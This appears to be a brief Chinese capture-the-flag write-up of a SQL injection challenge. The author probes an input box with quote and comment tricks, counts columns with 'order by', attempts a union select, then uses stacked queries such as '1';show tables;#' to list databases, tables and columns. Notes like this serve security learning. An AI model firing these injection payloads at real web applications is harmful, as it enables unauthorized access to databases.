打开题目看见一个输入框
输入’报错 应该是有sql注入了
使用 1’ # 正确显示
直接上 order by
1' order by 3 #
测试1,2正常,3报错
此时天真的我以为我已经离成功不远了~~
启动联合查询
-1' union select 1,2 #
提交
测试发现堆叠注入可用
1';show databases;#
1';show tables;#
1';show columns from words;#
1';show columns from 1919810931114514;#
就在这时,这张表的数据查不出来,刚开始我还以为是我的问题,毕竟菜,是自己的问题概率毕竟大,还反复试了很久 -_-! ,至此,我明白了菜是原罪T_T.
最后去看了大佬的wp才知道不是我的问题,
不过最后的读出flag的骚操作还是要sql语言扎实才能想到…
参考:https://blog.csdn.net/qq_26406447/article/details/90643951